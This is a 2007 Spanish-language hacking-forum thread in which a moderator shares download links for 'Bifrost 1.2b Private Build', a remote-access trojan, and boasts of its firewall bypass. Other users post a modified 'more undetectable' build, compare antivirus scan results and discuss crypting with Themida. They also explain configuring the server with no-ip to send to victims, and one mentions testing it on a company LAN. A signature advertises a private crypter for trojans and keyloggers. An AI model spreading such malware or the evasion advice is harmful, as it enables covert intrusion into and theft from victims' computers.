Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Julio 24, 2008, 06:29:33
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderadores: -Erick-, Angelus_7722)  |  Tema: Bifrost 1.2b Private Build 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: Bifrost 1.2b Private Build  (Leído 2800 veces)
Angelus_7722
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1141



Ver Perfil
« en: Noviembre 09, 2007, 09:36:09 »
Bifrost 1.2b Private Build    cortesía DaRktoux





Bifrost 1.2b Private Build es una versión privada que era indetectable por el mismo programador "ksv", ésta versión es la que venden en www.conexion-inversa.com a un poco mas de 80 USD.

Esta edición tiene un poderoso método para saltar los firewalls, incluyendo a los mas importantes como Zone Alarm y Outpost.


Lastimosamente ya algunos antivirus la detectan, el motivo es porque alguien compró esta versión y la público, descuiden siempre sucede xD.

AhnLab-V3   2007.11.9.0   2007.11.08   -
AntiVir           7.6.0.34   2007.11.08   TR/Agent.64188
Authentium   4.93.8           2007.11.07   -
Avast           4.7.1074.0   2007.11.08   -
AVG           7.5.0.503   2007.11.08   -
BitDefender   7.2           2007.11.08   DeepScan:Generic.Malware.SE!dldg.2D80FFBF
CAT-QuickHeal   9.00         2007.11.08   -
ClamAV      0.91.2      2007.11.09   -
DrWeb      4.44.0.09170   2007.11.08   -
eSafe      7.0.15.0   2007.11.08   Suspicious File
eTrust-Vet   31.2.5281   2007.11.08   -
Ewido      4.0      2007.11.08   -
FileAdvisor   1      2007.11.09   -
Fortinet   3.11.0.0   2007.10.19   -
F-Prot      4.4.2.54   2007.11.07   -
F-Secure   6.70.13030.0   2007.11.09   Trojan.Win32.Agent.cnd
Ikarus      T3.1.1.12   2007.11.08   Trojan.Win32.Agent.cnd
Kaspersky   7.0.0.125   2007.11.09   Trojan.Win32.Agent.cnd
McAfee      5159      2007.11.08   -
Microsoft   1.3007      2007.11.09   -
NOD32v2      2646      2007.11.08   -
Norman      5.80.02      2007.11.08   -
Panda      9.0.0.4      2007.11.09   -
Prevx1      V2      2007.11.09   -
Rising      20.17.32.00   2007.11.08   -
Sophos      4.23.0      2007.11.09   -
Sunbelt      2.2.907.0   2007.11.08   -
Symantec   10      2007.11.09   -
TheHacker   6.2.9.120   2007.11.08   -
VBA32      3.12.2.4   2007.11.08   -
VirusBuster   4.3.26:9   2007.11.08   -
Webwasher-Gateway   6.0.1   2007.11.09   Trojan.Agent.64188


Como veran ya detectan el server 7 antivirus y pensar que hace 2/3 semanas solo lo detectaban 2 antivirus.
Pero bueno es un excelente troyano para quienes siguen usando estas herramientas y para que sustituyan su Bifrost normal por este.

Descarga:
http://rapidshare.com/files/68523278/Bifrost_1.2b_Private_Build.rar.html

saludos
En línea


Leer antes de Trabajar con Troyanos
GN1000
Colaborador
*****
Desconectado Desconectado

Mensajes: 420



Ver Perfil WWW
« Respuesta #1 en: Noviembre 09, 2007, 10:45:53 »
Se saltaría el firewall de Kaspersky si lo pudiera hacer indetectable con Themida?

Gracias.
En línea
Angelus_7722
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1141



Ver Perfil
« Respuesta #2 en: Noviembre 09, 2007, 10:57:01 »
Cita de: GN1000 en Noviembre 09, 2007, 10:45:53
Se saltaría el firewall de Kaspersky si lo pudiera hacer indetectable con Themida?

Gracias.
no lo he probado todavía, pero lo debes trabajar como si fuera la version normal (pasarle themida o las herramientas requeridas para indetectarlo), solo que tiene unas caracteristicas adicionales que lo hacen un poco mas especial.
Hay que probar.

saludos

pd: me funk de maravilla...........lo probe en la Lan de la empresa y  Evil...........por si no se han dado cuenta, la forma de crear el server es diferente. Cuando se crea se debe abrir el server adlunto en la descarga para que actualice los datos.................excelente.
Y eso que me encanta el posion ivy
« Última modificación: Noviembre 09, 2007, 02:51:18 por Angelus_7722 » En línea


Leer antes de Trabajar con Troyanos
j4ps0n
Habitual
*****
Desconectado Desconectado

Mensajes: 170



Ver Perfil
« Respuesta #3 en: Noviembre 09, 2007, 02:09:54 »
Buen aporte, habrá que probarlo.
En línea

¿Quieres tener un troyano o keylogger 100%  Indetectable?
Es muy fácil usando un Crypter Privado.  Indetectable a todos los antivirus con un solo click.
Mándame un PM si estás interesado o quieres más info.
enoc
Miembro
*****
Desconectado Desconectado

Mensajes: 32


Ver Perfil
« Respuesta #4 en: Noviembre 10, 2007, 10:52:33 »
Saludos , al descomprimir junto con el Bifrost aparece el arxivo server.exe, tambien hay que ejecutarlo? o para que sirve? Gracias Evil
En línea
BinaRy
Recien Llegado
*
Desconectado Desconectado

Mensajes: 14



Ver Perfil
« Respuesta #5 en: Noviembre 11, 2007, 10:54:36 »
Cita de: enoc en Noviembre 10, 2007, 10:52:33
Saludos , al descomprimir junto con el Bifrost aparece el arxivo server.exe, tambien hay que ejecutarlo? o para que sirve? Gracias Evil

no lo deves de ejecutar es el server que deves de mandar a la victima pero antes lo deves de configurar con tus datos y no-ip,lo configuras y cunado le des a Build te pedira que abras el server.exe "lo deves de descomprimir" y este sera reemplazdo por el configurado
En línea
----> OwNeD <----
*¿-?--?-¿*
alexlinux
Miembro
*****
Desconectado Desconectado

Mensajes: 73



Ver Perfil
« Respuesta #6 en: Noviembre 12, 2007, 08:09:35 »
muchas gracias si sirve Cheesy !!
En línea
polifemo
Recien Llegado
*
Desconectado Desconectado

Mensajes: 19


Ver Perfil Email
« Respuesta #7 en: Noviembre 13, 2007, 08:15:47 »
Gracias por el aporte Angelus_7722...

Yo hice alguna molificación en el server de este "inmenso troyano"... Para hacerlo mas indetectable...

y como conocí esta versión, por este post, me pareció justo compartir mi server con ustedes tambien...


Server_polifemo

AhnLab-V3 2007.11.14.0 2007.11.13 -
AntiVir 7.6.0.34 2007.11.13 -
Authentium 4.93.8 2007.11.13 -
Avast 4.7.1074.0 2007.11.13 -
AVG 7.5.0.503 2007.11.13 -
BitDefender 7.2 2007.11.13 DeepScan:Generic.Malware.SE!dldg.24CDB148
CAT-QuickHeal 9.00 2007.11.13 -
ClamAV 0.91.2 2007.11.13 -
DrWeb 4.44.0.09170 2007.11.13 -
eSafe 7.0.15.0 2007.11.13 Suspicious File
eTrust-Vet 31.2.5293 2007.11.13 -
Ewido 4.0 2007.11.13 -
FileAdvisor 1 2007.11.14 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.13 -
F-Secure 6.70.13030.0 2007.11.13 -
Ikarus T3.1.1.12 2007.11.13 -
Kaspersky 7.0.0.125 2007.11.13 Heur.Invader
McAfee 5162 2007.11.13 -
Microsoft 1.3007 2007.11.12 -
NOD32v2 2656 2007.11.13 -
Norman 5.80.02 2007.11.13 -
Panda 9.0.0.4 2007.11.14 -
Prevx1 V2 2007.11.14 -
Rising 20.18.11.00 2007.11.13 -
Sophos 4.23.0 2007.11.13 -
Sunbelt 2.2.907.0 2007.11.13 -
Symantec 10 2007.11.13 -
TheHacker 6.2.9.126 2007.11.13 -
VBA32 3.12.2.4 2007.11.11 -
VirusBuster 4.3.26:9 2007.11.13 -
Webwasher-Gateway 6.0.1 2007.11.13 Win32.Malware.gen!88 (suspicious)


Descarga Server_polifemo:  http://download.yousendit.com/EE552C12520D4465



Tienen un lindo foro, los felicito! palmas palmas palmas

Saludos

PD: Mis respetos a DaRktoux...
En línea
dark confundido
Habitual
*****
Desconectado Desconectado

Mensajes: 177


Maestro Troyano


Ver Perfil WWW
« Respuesta #8 en: Noviembre 13, 2007, 08:44:33 »
Cita de: polifemo en Noviembre 13, 2007, 08:15:47
Gracias por el aporte Angelus_7722...

Yo hice alguna molificación en el server de este "inmenso troyano"... Para hacerlo mas indetectable...

y como conocí esta versión, por este post, me pareció justo compartir mi server con ustedes tambien...


Server_polifemo

AhnLab-V3 2007.11.14.0 2007.11.13 -
AntiVir 7.6.0.34 2007.11.13 -
Authentium 4.93.8 2007.11.13 -
Avast 4.7.1074.0 2007.11.13 -
AVG 7.5.0.503 2007.11.13 -
BitDefender 7.2 2007.11.13 DeepScan:Generic.Malware.SE!dldg.24CDB148
CAT-QuickHeal 9.00 2007.11.13 -
ClamAV 0.91.2 2007.11.13 -
DrWeb 4.44.0.09170 2007.11.13 -
eSafe 7.0.15.0 2007.11.13 Suspicious File
eTrust-Vet 31.2.5293 2007.11.13 -
Ewido 4.0 2007.11.13 -
FileAdvisor 1 2007.11.14 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.13 -
F-Secure 6.70.13030.0 2007.11.13 -
Ikarus T3.1.1.12 2007.11.13 -
Kaspersky 7.0.0.125 2007.11.13 Heur.Invader
McAfee 5162 2007.11.13 -
Microsoft 1.3007 2007.11.12 -
NOD32v2 2656 2007.11.13 -
Norman 5.80.02 2007.11.13 -
Panda 9.0.0.4 2007.11.14 -
Prevx1 V2 2007.11.14 -
Rising 20.18.11.00 2007.11.13 -
Sophos 4.23.0 2007.11.13 -
Sunbelt 2.2.907.0 2007.11.13 -
Symantec 10 2007.11.13 -
TheHacker 6.2.9.126 2007.11.13 -
VBA32 3.12.2.4 2007.11.11 -
VirusBuster 4.3.26:9 2007.11.13 -
Webwasher-Gateway 6.0.1 2007.11.13 Win32.Malware.gen!88 (suspicious)


Descarga Server_polifemo:  http://download.yousendit.com/EE552C12520D4465



Tienen un lindo foro, los felicito! palmas palmas palmas

Saludos

PD: Mis respetos a DaRktoux...

guau es polifemo

llego el ke si sabe  Grin

HOLAS POLIFEMO oye y el foro INDETECTABLES no va mas???
soy dark julius belmont avisame cuando regresara XD
En línea
Angelus_7722
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1141



Ver Perfil
« Respuesta #9 en: Noviembre 13, 2007, 09:15:45 »
Realmente es un honor tenerte en este foropolifermo Grin  he visto grandes aportes en otros foros y son geniales.............comparto la opion de Dark ya que eres alguien que tiene gran reconocimiento en este mundo.

saludos y gracias por este gran aporte.  Wink
En línea


Leer antes de Trabajar con Troyanos
Lady-Bk
Recien Llegado
*
Desconectado Desconectado

Mensajes: 13


Lady-Bk


Ver Perfil
« Respuesta #10 en: Diciembre 12, 2007, 09:02:42 »
1 pregunta komo hago para agregar 1 ip en el bifrost eh intentado todo peor no  puedo saludos !!
En línea
Lady-Bk >.< Por 1 hacker mejor...
PocH
Miembro
*****
Desconectado Desconectado

Mensajes: 49



Ver Perfil
« Respuesta #11 en: Diciembre 13, 2007, 04:24:36 »
hey ke chido ke buentrabajo con lo del server un buen aporte pero alguien podria subir  otraves el server para descargarlo porke el link ya expiro Sad y gracias por tu gran aporte polifemo Cheesy
En línea
Angelus_7722
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1141



Ver Perfil
« Respuesta #12 en: Diciembre 13, 2007, 08:43:08 »
Bueno PocH..................

en INDICE Troyanos - TODO LO NECESARIO, TODO!!!  puedes encontrar el server de polifemo para la descaga

saludos
En línea


Leer antes de Trabajar con Troyanos
PocH
Miembro
*****
Desconectado Desconectado

Mensajes: 49



Ver Perfil
« Respuesta #13 en: Diciembre 13, 2007, 11:48:55 »
 Grin gracias master
En línea
PERKER
Colaborador
*****
Desconectado Desconectado

Mensajes: 605


iron rules

perker@el-hacker.org
Ver Perfil WWW
« Respuesta #14 en: Diciembre 14, 2007, 02:25:10 »
hola, yo tengo el poison ivy, baje el bitfrost private, alguien me prodia explicar o si ahi un tuto de como configurar el server, se los agradeceria.
En línea
delalo
Recien Llegado
*
Desconectado Desconectado

Mensajes: 1


Ver Perfil
« Respuesta #15 en: Diciembre 14, 2007, 08:13:11 »
 
    Hola a todos ! ... tengo una pregunta acerca de esta version mejorada del bifrost con el server ( polifemo ) ... al momento de dar clik en  Built  .... pide abrir el server ..bien  entonces selecciono la carpeta  .rar donde se haya el server y el bifrost y le doy aceptar pero no genera el server, pense que el problema era porque habia expirado el link ... para asegurarme esta vez ... y no tener problemas lo descargue desde el indice de Troyanos ... entonces otra vez cuando le doy build  selecciono la carpeta rar ( server polifeno) pero no me aparece el nuevo server generado .... plz ... alguien me podria aclarar como generar el server?

                      Gracias...
En línea
Angelus_7722
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1141



Ver Perfil
« Respuesta #16 en: Diciembre 15, 2007, 09:36:09 »
Es muy sencillo.......... tienes 2 archivos:

- Bifrost   .exe
- server.exe (polifermo)   

Deden descomprimir los archivos.............la configuracion es normal que la pueden encontrar en cualquier manual, pero la diferencias està al momento de costruirlo.
Cuano le dan crear (build), se abrirà una vemtana solicitando  abrir un archivo, el server.exe, en este caso deben buscar el server.exe de polifermo obviamente descomprimido.
Cuando realizan esta accion, las caracteristicas de configuracion son agregadas al server.exe, es decir, no se crea uno nuevo, simplemente se modifica las caracteristica del existente.

espero haberles resulto las dudas

saludos
En línea


Leer antes de Trabajar con Troyanos
adiel244
Recien Llegado
*
Desconectado Desconectado

Mensajes: 2


Ver Perfil
« Respuesta #17 en: Diciembre 17, 2007, 04:10:12 »
Lastima.. el nod y kis ya lo detectan... ademas trate de pasarlo por el themida y sdprotector y no se deja protejer, salta error en los dos.  con la Bifrost 1.2b Private Build, si se deja protejer... gracias
En línea
rtyrtyrty
Miembro
*****
Desconectado Desconectado

Mensajes: 135


fflush(stdmind);


Ver Perfil
« Respuesta #18 en: Diciembre 17, 2007, 05:58:43 »
Que tal, el link esta roto, podrian colocarlo de nuevo por favor. El server de la version modificada por polifemo de hrkv no se deja pasar por el Themida, ayuda por favor...gracias.

SALU2
En línea
Angelus_7722
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1141



Ver Perfil
« Respuesta #19 en: Diciembre 17, 2007, 09:44:03 »
Cita de: rtyrtyrty en Diciembre 17, 2007, 05:58:43
Que tal, el link esta roto, podrian colocarlo de nuevo por favor. El server de la version modificada por polifemo de hrkv no se deja pasar por el Themida, ayuda por favor...gracias.

en INDICE Troyanos - TODO LO NECESARIO, TODO!!!  puedes  descargarlo

saludos
En línea


Leer antes de Trabajar con Troyanos
mauro892
Miembro
*****
Desconectado Desconectado

Mensajes: 23


NO SE


Ver Perfil WWW Email
« Respuesta #20 en: Diciembre 17, 2007, 10:55:13 »
ese troyano es muy bueno aunque es remil detectado ya, hace unos meses era indetectable. el stl packer lo deja casi indetectable.
PD: si kieren  pueden bajarlo de mi pagina a la version sin encriptar que le puede pasar el themida, aunque no lo mejora mucho.
En línea
SIN FIRMA....
puto11
Recien Llegado
*
Desconectado Desconectado

Mensajes: 6


Ver Perfil Email
« Respuesta #21 en: Diciembre 18, 2007, 05:31:16 »
Polifemo como puedo cambiar las opciones de tu server para que me la lea mi bifrost, es decir, cambiar la ip del server para que la información que envie me la mande a mi???

Un saludo
En línea
rtyrtyrty
Miembro
*****
Desconectado Desconectado

Mensajes: 135


fflush(stdmind);


Ver Perfil
« Respuesta #22 en: Diciembre 19, 2007, 01:16:24 »
Cita de: Angelus_7722 en Diciembre 17, 2007, 09:44:03
Cita de: rtyrtyrty en Diciembre 17, 2007, 05:58:43
Que tal, el link esta roto, podrian colocarlo de nuevo por favor. El server de la version modificada por polifemo de hrkv no se deja pasar por el Themida, ayuda por favor...gracias.

en INDICE Troyanos - TODO LO NECESARIO, TODO!!!  puedes  descargarlo

saludos


Hola, gracias por la info.
Salu2
En línea
kj
Colaborador
*****
Desconectado Desconectado

Mensajes: 716


el que madruga dios lo arruga

jjk_192@hotmail.com
Ver Perfil Email
« Respuesta #23 en: Diciembre 20, 2007, 07:35:28 »

bajando y provando.... Cool

kj
En línea
*si la vida te da la espalda agarrale el culo.
*la cerveza mata lentamente, pero no tengo apuro  alguno.
*daria todo lo que se por la mitad de lo que ignoro.
acabemos con rapidshare y megaupload. clic aqui
The Ghost System
Habitual
*****
Desconectado Desconectado

Mensajes: 168


Linux User Forever


Ver Perfil
« Respuesta #24 en: Diciembre 22, 2007, 04:31:01 »
Cita de: Angelus_7722 en Diciembre 15, 2007, 09:36:09
Es muy sencillo.......... tienes 2 archivos:

- Bifrost   .exe
- server.exe (polifermo)   

Deden descomprimir los archivos.............la configuracion es normal que la pueden encontrar en cualquier manual, pero la diferencias està al momento de costruirlo.
Cuano le dan crear (build), se abrirà una vemtana solicitando  abrir un archivo, el server.exe, en este caso deben buscar el server.exe de polifermo obviamente descomprimido.
Cuando realizan esta accion, las caracteristicas de configuracion son agregadas al server.exe, es decir, no se crea uno nuevo, simplemente se modifica las caracteristica del existente.

espero haberles resulto las dudas

saludos


Y entonces cuando se substituye el server.exe de polifemo, por el mío no hace falta que lo pase por themida ni nada yo? Ya es indetectable o que? Esque lo he  escaneado y es detectable... xD
En línea
Páginas: [1] 2 Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderadores: -Erick-, Angelus_7722)  |  Tema: Bifrost 1.2b Private Build « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC